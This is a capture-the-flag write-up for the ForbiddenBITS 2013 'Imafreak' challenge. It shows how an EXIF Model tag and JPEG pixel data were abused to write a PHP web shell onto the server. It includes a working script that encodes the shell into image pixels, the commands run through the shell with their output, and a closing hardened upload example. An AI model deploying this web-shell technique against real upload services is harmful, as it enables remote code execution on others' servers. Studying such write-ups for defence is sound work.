Imafreak - ForbiddenBITS 2013
March 17, 2013
For this challenge we were given a link to a website (http://192.73.237.131/) and a hint (Hint6[Freak]:~). On the site we can upload and view JPEG images:
Following the hint, we can get the source code of the view.php script: appending ~ retrieves the editor's backup copy of the file (http://192.73.237.131/view.php~).
Wild vulnerability appears in these lines:
// $filex is the destination path; its extension comes from $camModel, which is read from the EXIF data of the upload
// $dd is the content rebuilt from the image pixels
$fp = fopen($filex, 'w');
fwrite($fp, $dd);
fclose($fp);
We control the $camModel variable through the EXIF data of the image, and the $dd variable by making a JPEG whose red channel carries a shellcode. The objective is to get the server to write a PHP script (camModel = .php) containing our shellcode:
<?php
// shellcode (a one-line PHP web shell that runs the "c" query parameter)
$shell = '<?php system($_GET["c"]);die; ?>';
$width = strlen($shell);
// create a 1-pixel-high true color image, one pixel per shellcode byte
$img = imagecreatetruecolor($width, 1);
for ($x = 0; $x < $width; $x++) {
    // get the ASCII value of the current shellcode byte
    $value = ord($shell[$x]);
    // store the byte in every channel (so the red channel holds it);
    // on a true color image imagecolorexact() returns the packed RGB value
    $color = imagecolorexact($img, $value, $value, $value);
    imagesetpixel($img, $x, 0, $color);
}
// save the image using 100% quality so the pixel values survive compression
imagejpeg($img, 'imafreak.jpg', 100);
// add the Model metadata using the exiv2 tool (the server uses it as the file extension)
system('exiv2.exe -M "add Exif.Image.Model .php" imafreak.jpg');
The result of the script is this image (right click, save target as, to inspect it):
By uploading the JPEG, we can execute commands on the server:
List files in root folder
view-source:http://192.73.237.131/secretstoreddata/67c6a1e7ce56d3d6fa748ab6d9af3fd7.php?c=ls%20-lia%20../
total 344
7999660 drwxr-xr-x 9 root root 4096 Mar 16 13:46 .
7999659 drwxr-xr-x 6 root root 4096 Feb 15 15:35 ..
8000136 -rw-r--r-- 1 root root 164 Mar 14 21:01 confirmed.txt
7999914 drwxr-xr-x 2 root root 4096 Mar 16 07:29 css
7999917 drwxr-xr-x 6 root root 4096 Mar 16 07:30 css_pirobox
8000029 drwxr-xr-x 2 root root 4096 Mar 16 07:31 images
8000137 -rw-r--r-- 1 root root 2588 Mar 16 07:51 index.php
8000057 drwxr-xr-x 2 root root 4096 Mar 16 07:31 js
8000138 -rw-r--r-- 1 root root 741 Dec 28 2010 piecemaker.css
8000139 -rw-r--r-- 1 root root 39 Mar 14 21:13 robots.txt
8000123 drwxrwxrwx 2 root root 49152 Mar 17 23:52 secretstoreddata
8000140 -rw-r--r-- 1 root root 57 Mar 16 07:24 super_nooooo_flag_dafuq_is_this.php
8000141 -rw-r--r-- 1 root root 8153 Apr 4 2011 templatemo_style.css
8000126 drwxrwxrwx 2 root root 225280 Mar 17 23:52 upload
8000142 -rw-r--r-- 1 root root 3203 Mar 16 13:45 upload.php
8000143 -rw-r--r-- 1 root root 3464 Mar 16 12:02 view.php
8000144 -rw-r--r-- 1 root root 3589 Mar 16 12:02 view.php~
8000134 drwxr-xr-x 2 root root 4096 Mar 16 07:32 wehatebatman
Read first flag
view-source:http://192.73.237.131/secretstoreddata/67c6a1e7ce56d3d6fa748ab6d9af3fd7.php?c=cat%20../super_nooooo_flag_dafuq_is_this.php
/*
FLAG : dafuq_is_this_shit_i_guess_its_flag
*/
?>
Unfortunately, we were unable to get the second flag. After the competition, Phiber from Activalink pointed us to it: it was the first JPEG image ever uploaded to the imafreak service (http://192.73.237.131/upload/c4ca4238a0b923820dcc509a6f75849b.jpg):
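As an added example (not the challenge's own view.php or upload.php), here is how the upload side of a service like this can be written so that neither of the two inputs abused above is trusted: the file name never comes from EXIF and the stored bytes are a fresh server-side encoding rather than the client's file. The form field name "image" and the ./upload directory are assumptions.

```php
<?php
// Hardened JPEG upload handler (added example; assumes form field "image"
// and an ./upload directory that the web server is configured not to execute).
const UPLOAD_DIR = __DIR__ . '/upload';
const MAX_BYTES  = 2 * 1024 * 1024;

function storeUploadedJpeg(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('upload rejected');
    }
    // Decide the type from the bytes, never from the client name or metadata.
    $info = getimagesize($file['tmp_name']);
    if ($info === false || $info[2] !== IMAGETYPE_JPEG) {
        throw new RuntimeException('not a JPEG');
    }
    // Decode and re-encode: the new file carries no EXIF/APPn segments at all,
    // so a Model tag such as ".php" never reaches any file system path, and the
    // pixels are re-compressed instead of being copied byte for byte.
    $img = @imagecreatefromjpeg($file['tmp_name']);
    if ($img === false) {
        throw new RuntimeException('decode failed');
    }
    // Server-chosen random name with a fixed extension; nothing from the
    // request (name, extension, EXIF) influences the destination path.
    $name = bin2hex(random_bytes(16)) . '.jpg';
    $dest = UPLOAD_DIR . '/' . $name;
    if (!imagejpeg($img, $dest, 90)) {
        imagedestroy($img);
        throw new RuntimeException('write failed');
    }
    imagedestroy($img);
    return $name;
}

// The viewer side should serve the stored file as image data only; it must
// never include() a path derived from the upload or write pixel data to a
// name the client can steer, which is exactly what view.php did here.
header('Content-Type: text/plain');
try {
    $file = $_FILES['image'] ?? ['error' => UPLOAD_ERR_NO_FILE, 'size' => 0];
    echo storeUploadedJpeg($file);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo $e->getMessage();
}
```

Re-encoding is a defence in depth step, not the fix on its own: the properties that actually close the hole are the server-generated name with a fixed .jpg extension and an upload directory from which PHP is never executed.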